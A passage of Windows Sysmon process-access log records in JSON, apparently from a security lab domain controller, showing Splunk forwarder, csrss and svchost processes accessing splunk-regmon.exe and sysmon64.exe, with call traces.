Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:06:44.709","SourceProcessGUID":"{41C8662E-1FF3-5F25-0000-00109F540500}","SourceProcessId":"4576","SourceThreadId":"2580","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","TargetProcessGUID":"{41C8662E-2294-5F25-0000-001058C90F00}","TargetProcessId":"4772","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:06:46","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:06:44","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8010,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:06:44.709\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 772\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-2294-5F25-0000-001058C90F00}\r\nTargetProcessId: 4772\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:06:44.709","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"772","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-2294-5F25-0000-001058C90F00}","TargetProcessId":"4772","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 08:06:46","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:06:44","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8011,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:06:44.709\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:06:44.709","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:06:46","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:06:44","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8012,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:06:44.709\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:06:44.709","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:06:46","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:06:44","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8013,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:06:44.709\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:06:44.709","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:06:46","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:06:44","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8014,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:06:44.709\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:06:44.709","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:06:46","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:06:44","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8015,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:06:44.709\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:06:44.709","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:06:46","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:06:44","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8016,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:06:44.709\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:06:44.709","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:06:46","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:06:44","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8017,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:06:44.709\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:06:44.709","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\